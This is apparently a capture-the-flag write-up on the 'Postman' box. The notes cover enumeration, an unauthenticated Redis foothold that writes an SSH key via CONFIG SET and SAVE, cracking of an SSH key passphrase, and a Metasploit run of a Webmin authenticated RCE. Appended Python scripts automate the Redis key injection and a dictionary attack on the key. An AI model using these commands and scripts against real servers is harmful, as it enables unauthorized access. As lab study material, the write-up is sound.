# Lessons Learned
- Don't fully trust Google AI Overview or Bing suggestions for version-to-CVE mappings
- Blog posts and writeups are more accurate; confirm against the advisory or a PoC
- When checking service versions for exploits, search with Google, `searchsploit`, and `msf`
- Sometimes the web server is a dead end > know when to move on to another service; we can always revisit it later
- If we are getting errors using `id_rsa` or the like, review the basics like file ownership and mode (`ls -l`)
- Maybe we need to add `sudo` to run the command, or `chown` the key to our own user
---
# After-Action Attack Sequence
- Rare services on box: redis and webmin
- Leverage unauthenticated access (no `requirepass` set) to `redis` version 4.0.9 to write an ssh pubkey to `/var/lib/redis/.ssh/authorized_keys` via `CONFIG SET dir`/`dbfilename` and `SAVE`
- `redis` is an in-memory key-value db/cache; `SAVE` dumps it to whatever file `dir` + `dbfilename` point at
- This gives us access to the box as the `redis` user
- From here we find a clue in `.bash_history` that the Matt user stored `id_rsa.bak` somewhere
- Locate `id_rsa.bak` and notice that it is a legacy PEM key encrypted with 3DES (`DEK-Info: DES-EDE3-CBC`)
- Crack the passphrase for `id_rsa.bak` using `ssh2john` and `john`
- When we try to use the privkey to connect via ssh, the connection drops right away (auto disconnect)
- Reuse the passphrase for `su Matt` > works
- This gives us `user.txt`
- Reuse the passphrase to access webmin as `Matt`
- Search for vulns associated with version 1.910
- Run the `msf` module associated with CVE-2019-12840 (authenticated RCE through the Package Updates module)
- Make sure to enable the `SSL` option because webmin on port 10000 is served over https
---
# Discover Ports & Services
- `ping` test ![[images/Pasted image 20260317181555.png]]
- `nmap` scan - light ![[images/Pasted image 20260317181609.png]]
- `nmap` scan - detailed ![[images/Pasted image 20260317182057.png]]
- `nmap` scan - udp ![[images/Pasted image 20260317200736.png]]
---
# Service Enum
## Port 80: Apache httpd 2.4.29
- Visit page ![[images/Pasted image 20260317182748.png]]
- Note: `postman@htb`
- View source
- View request:response in `burp` ![[images/Pasted image 20260317183120.png]]
- No `robots.txt`; no `sitemap.xml`
- `whatweb` scan ![[images/Pasted image 20260317183223.png]]
- Web fuzzing
- directory
- raft-medium ![[images/Pasted image 20260317183541.png]]
- 2.3-medium ![[images/Pasted image 20260317193816.png]]
- subdomain
- 5000 ![[images/Pasted image 20260317193942.png]]
- 20000 ![[images/Pasted image 20260317195434.png]]
- vhost
- 20000 ![[images/Pasted image 20260317195829.png]]
- FUZZ.html
- 2.3-medium ![[images/Pasted image 20260317201251.png]]
---
## Port 10000: Webmin 1.910
- CVEs
- CVE-2024-12828: authenticated command injection (needs creds we don't have yet)
- CVE-2019-15107: unauthenticated RCE in `password_change.cgi`; on 1.900-1.920 it only triggers when the "prompt users with expired passwords" option is enabled
- Visit page ![[images/Pasted image 20260317193615.png]]
- Visit `https://10.129.2.1:10000/password_change.cgi` ![[images/Pasted image 20260317194454.png]]
- View source ![[images/Pasted image 20260317194528.png]]
- According to the page source above, this is Webmin 1.910 on Postman (Ubuntu Linux 18.04.3)
- Maybe password changing is disabled? ![[images/Pasted image 20260317195343.png]]
- Also try [ruthvikvegunta/CVE-2019-15107: Webmin <=1.920 RCE](https://github.com/ruthvikvegunta/CVE-2019-15107)
- No dice > password changing must be disabled, so CVE-2019-15107 is out ![[images/Pasted image 20260317200230.png]]
- Got locked out after trying some common credential combos ![[images/Pasted image 20260317201648.png]]
- Looks like it was a temporary lockout and not a permanent block
---
## Port 6379: Redis db 4.0.9
- Connect with `redis-cli`
- Note: redis version 4.0.9
- We can connect without authentication (no `requirepass` set)
```bash
redis-cli -h 10.129.2.1 -p 6379
```
![[images/Pasted image 20260317202143.png]]
- Enumerate with `use auxiliary/scanner/redis/redis_server` module within `msf`
- This is just the output from the `INFO` command
- Google "redis 4.0.9 abuse anonymous access"
- Looks like we can write an SSH key by pointing the RDB dump at `.ssh/authorized_keys`?
---
# Foothold > Port 6379: `redis`
## Attempt 1
- Create SSH key pair ![[images/Pasted image 20260317203844.png]]
- Add newline padding around the pubkey so sshd sees it on a line of its own inside the RDB dump
- Run the following after confirming redis accepts commands without auth
```bash
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > pub.key   # padded pubkey
redis-cli -h 10.129.2.1 -x SET crackit < pub.key             # value of "crackit" = padded key
redis-cli -h 10.129.2.1 CONFIG SET dir /root/.ssh/
redis-cli -h 10.129.2.1 CONFIG SET dbfilename authorized_keys
redis-cli -h 10.129.2.1 SAVE
```
- Looks like we do not have write access to `/root/.ssh/` ![[images/Pasted image 20260317205711.png]]
- Determine current directory and db ![[images/Pasted image 20260317205345.png]]
- We have access to `/var/lib/redis`
- Try commands again with writable dir above
```bash
SET crackit "pub.key"
CONFIG SET dir /var/lib/redis/.ssh
CONFIG SET dbfilename "authorized_keys"
SAVE
```
![[images/Pasted image 20260317205557.png]]
- ssh ignores the key and falls back to password auth, prompting for the `redis` user's password
---
## Attempt 2
- Create key pair > do not deviate from the default naming convention (`id_rsa`/`id_rsa.pub`) ![[images/Pasted image 20260317211316.png]]
- Run the redis commands again with the writable dir above
```bash
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > pwn.txt   # padded pubkey
redis-cli -h 10.129.2.1 FLUSHALL                                    # drop other keys so only ours lands in the dump
redis-cli -h 10.129.2.1 -x SET crackit < pwn.txt
redis-cli -h 10.129.2.1 CONFIG SET dir /var/lib/redis/.ssh
redis-cli -h 10.129.2.1 CONFIG SET dbfilename authorized_keys
redis-cli -h 10.129.2.1 SAVE
ssh -i ~/.ssh/id_rsa redis@10.129.2.1
```
- Getting an SSH error `Load key "id_rsa": Permission denied` when we review the verbose (`-v`) output
- Maybe it's because `root` is the owner of `id_rsa`?
- Let's prepend `sudo`, and if that doesn't work `chown` the key to `jacob` ![[images/Pasted image 20260317212558.png]]
- OK, we are in now
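As an added example (not part of this writeup or of redis-cli), the Python below shows the RESP bytes `redis-cli` sends for the sequence used in Attempt 1 and 2, and why the pubkey needs the blank-line padding: a constructed stand-in for the RDB dump is parsed the way sshd reads `authorized_keys`, once without and once with padding. `SAMPLE_PUBKEY`, `fake_rdb` and the `crackit` key name are assumptions for the demo; the only function that touches the network is `inject_via_redis`, which expects an unauthenticated Redis like the one on the box.

```python
import re
import socket

# Constructed sample key (not a real credential): a truncated RSA public key line.
SAMPLE_PUBKEY = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0test redis@kali"


def resp_encode(*args: str) -> bytes:
    """Encode one command as a RESP array of bulk strings, the wire form redis-cli sends."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def pad_pubkey(pubkey: str) -> str:
    """Blank lines on both sides of the key so the RDB header lands on the line before it
    and the RDB trailer on the line after it; sshd skips both junk lines."""
    return "\n\n" + pubkey.strip() + "\n\n"


def fake_rdb(value: str) -> bytes:
    """Constructed stand-in for the dump SAVE writes with one string key 'crackit':
    magic + version, an aux field, DB selector, key/value, EOF marker, checksum.
    Not a real RDB encoder (the length byte is a placeholder)."""
    return (b"REDIS0008" + b"\xfa\x09redis-ver\x054.0.9" + b"\xfe\x00"
            + b"\x00\x07crackit" + b"\x40" + value.encode()
            + b"\xff" + b"\x00" * 8)


def authorized_keys_lines(blob: bytes) -> list[str]:
    """Approximate sshd's authorized_keys parsing: one key per line, a line must start
    with a key type followed by base64, and any line that does not parse is ignored.
    (sshd also tolerates an options prefix before the type; not modelled here.)"""
    found = []
    for line in blob.split(b"\n"):
        m = re.match(rb"^(ssh-(?:rsa|ed25519)|ecdsa-sha2-nistp\d+) ([A-Za-z0-9+/=]+)", line)
        if m:
            found.append(m.group(0).decode())
    return found


def padding_demo() -> tuple[list[str], list[str]]:
    """Keys sshd would accept from the dump written without vs with newline padding."""
    return (authorized_keys_lines(fake_rdb(SAMPLE_PUBKEY)),
            authorized_keys_lines(fake_rdb(pad_pubkey(SAMPLE_PUBKEY))))


def inject_via_redis(host: str, port: int, pubkey: str, ssh_dir: str) -> list[str]:
    """Replay the writeup's sequence over a raw socket and return each reply line
    (+OK on success, -ERR ... otherwise, e.g. when dir is not writable). Stops at the
    first error so a failed CONFIG SET dir is not followed by a SAVE into the old dir."""
    sequence = [
        ("FLUSHALL",),
        ("SET", "crackit", pad_pubkey(pubkey)),
        ("CONFIG", "SET", "dir", ssh_dir),
        ("CONFIG", "SET", "dbfilename", "authorized_keys"),
        ("SAVE",),
    ]
    replies = []
    with socket.create_connection((host, port), timeout=5) as sock:
        reader = sock.makefile("rb")
        for cmd in sequence:
            sock.sendall(resp_encode(*cmd))
            reply = reader.readline().rstrip(b"\r\n").decode(errors="replace")
            replies.append(reply)
            if not reply.startswith("+"):
                break
    return replies


if __name__ == "__main__":
    print(padding_demo())
```

`padding_demo()` returns an empty list for the unpadded dump (the key sits on the same line as the `REDIS0008` header, so sshd cannot parse it) and the key for the padded one. `inject_via_redis("10.129.2.1", 6379, open("id_rsa.pub").read(), "/var/lib/redis/.ssh")` is the live equivalent of Attempt 2; the `-ERR` you get back when `dir` is `/root/.ssh/` is exactly the Attempt 1 failure.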
---
## Internal Enum
- Light enum ![[images/Pasted image 20260317212817.png]]
- `sudo -l` prompts for the `redis` user's password, which we don't have
- Review `.bash_history` ![[images/Pasted image 20260317212752.png]]
- Let's hunt down `id_rsa.bak` ![[images/Pasted image 20260317213110.png]]
- This is promising
- We need a passphrase ![[images/Pasted image 20260317213257.png]]
- Move `linpeas.sh` to target
- Not much of interest
- Note: kept hanging on the cloud check
- Workaround: use the `-o` flag with a comma-separated list of checks that leaves out the cloud check
---
## Brute Force SSH Key
- Convert Matt's `id_rsa.bak` to a hash with `ssh2john` and attempt to crack it with `john` ![[images/Pasted image 20260317221730.png]]
- That cracks; see local file for passphrase
- When attempting to connect via ssh, the connection closes when I enter the passphrase
- Alternatively, reuse the passphrase for `su Matt` while logged in as `redis`
- That works
- Also, try reusing the passphrase to log into webmin as `Matt:passphrase`
- We are in ![[images/Pasted image 20260317223000.png]]
- Note: Webmin ver. 1.910, and Authentic Theme ver. 19.33
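Added example, not from this writeup: the two ssh-key problems above (`Load key "id_rsa": Permission denied` during the redis foothold, and the passphrase-protected `id_rsa.bak`) reproduced locally in Python. `key_file_problem` checks what ssh checks before it will use an identity file; `crack_passphrase` runs a dictionary attack by asking `ssh-keygen -y -P` to unlock a test key, the same offline check that `ssh2john` + `john` perform far faster. The passphrase `letmein`, the wordlist and the temporary key are constructed for the demo; `ssh-keygen` must be on PATH.

```python
from __future__ import annotations

import os
import shutil
import subprocess
import tempfile


def ssh_keygen_available() -> bool:
    return shutil.which("ssh-keygen") is not None


def key_file_problem(path: str) -> str | None:
    """Mirror the two reasons ssh refuses an identity file: it cannot read it
    (wrong owner/mode -> 'Load key ...: Permission denied') or the mode lets other
    users read it (-> 'UNPROTECTED PRIVATE KEY FILE!' and the key is ignored)."""
    if not os.access(path, os.R_OK):
        return "Permission denied: not readable by uid %d (check owner, or chown it)" % os.getuid()
    mode = os.stat(path).st_mode & 0o777
    if mode & 0o077:
        return "mode %03o is group/world accessible; chmod 600 it" % mode
    return None


def make_encrypted_test_key(directory: str, passphrase: str) -> str:
    """Generate a passphrase-protected RSA key in the legacy PEM format (the same
    'BEGIN RSA PRIVATE KEY' + DEK-Info layout as id_rsa.bak, which ssh2john handles)."""
    path = os.path.join(directory, "id_rsa")
    subprocess.run(
        ["ssh-keygen", "-q", "-t", "rsa", "-b", "2048", "-m", "PEM",
         "-N", passphrase, "-C", "test", "-f", path],
        check=True, stdin=subprocess.DEVNULL, capture_output=True)
    return path


def crack_passphrase(key_path: str, wordlist) -> str | None:
    """Offline dictionary attack in the spirit of ssh2john + john: ask ssh-keygen to
    derive the public key with each candidate; only the right passphrase succeeds."""
    for candidate in wordlist:
        if not candidate:  # an empty -P would make ssh-keygen prompt on a tty
            continue
        result = subprocess.run(
            ["ssh-keygen", "-y", "-P", candidate, "-f", key_path],
            stdin=subprocess.DEVNULL, capture_output=True, text=True)
        if result.returncode == 0 and result.stdout.startswith("ssh-"):
            return candidate
    return None


def permission_demo() -> tuple[str | None, str | None]:
    """Ownership/mode check on a dummy file at 644 and then at 600 (no ssh-keygen needed)."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "id_rsa")
        with open(path, "w") as fh:
            fh.write("dummy")
        os.chmod(path, 0o644)
        before = key_file_problem(path)
        os.chmod(path, 0o600)
        return before, key_file_problem(path)


def demo(wordlist=("password", "redis", "letmein", "postman")) -> dict:
    """Constructed scenario: key left world-readable, then fixed, then cracked."""
    with tempfile.TemporaryDirectory() as tmp:
        key = make_encrypted_test_key(tmp, "letmein")
        os.chmod(key, 0o644)
        too_open = key_file_problem(key)
        os.chmod(key, 0o600)
        return {"too_open": too_open, "fixed": key_file_problem(key),
                "cracked": crack_passphrase(key, wordlist)}


if __name__ == "__main__":
    print(permission_demo())
    if ssh_keygen_available():
        print(demo())
```

Against a real `id_rsa.bak`, `crack_passphrase("id_rsa.bak", open("rockyou.txt", errors="ignore").read().splitlines())` works but is slow because each candidate forks `ssh-keygen`; `ssh2john` + `john` do the same PEM decryption check in-process, which is why the writeup uses them.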
---
# Privesc
- Let's look at `searchsploit` ![[images/Pasted image 20260318191810.png]]
- This PoC notes a different CVE than the one I found earlier: CVE-2019-12840, authenticated RCE through Webmin's Package Updates module (`update.cgi`) ![[images/Pasted image 20260318192010.png]]
- Let's run `msf` and search for webmin ![[images/Pasted image 20260318192341.png]]
- We get some errors at first; we needed to set the `SSL` option to `true` because port 10000 serves https ![[images/Pasted image 20260318193451.png]]
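The `msf` run described above as a resource script, written here as an added example rather than taken from the writeup. The module path and option names are Metasploit's own for the CVE-2019-12840 module; the target IP matches the notes, while `LHOST`, `LPORT` and the redacted password are placeholders to fill in.

```msf
use exploit/linux/http/webmin_packageup_rce
set RHOSTS 10.129.2.1
set RPORT 10000
set SSL true
set USERNAME Matt
set PASSWORD <passphrase cracked from id_rsa.bak>
set LHOST tun0
set LPORT 4444
run
```

Save it as `webmin.rc` and start with `msfconsole -r webmin.rc`. Without `set SSL true` the module speaks plain HTTP to the TLS listener on 10000 and fails with the connection errors seen in the screenshot.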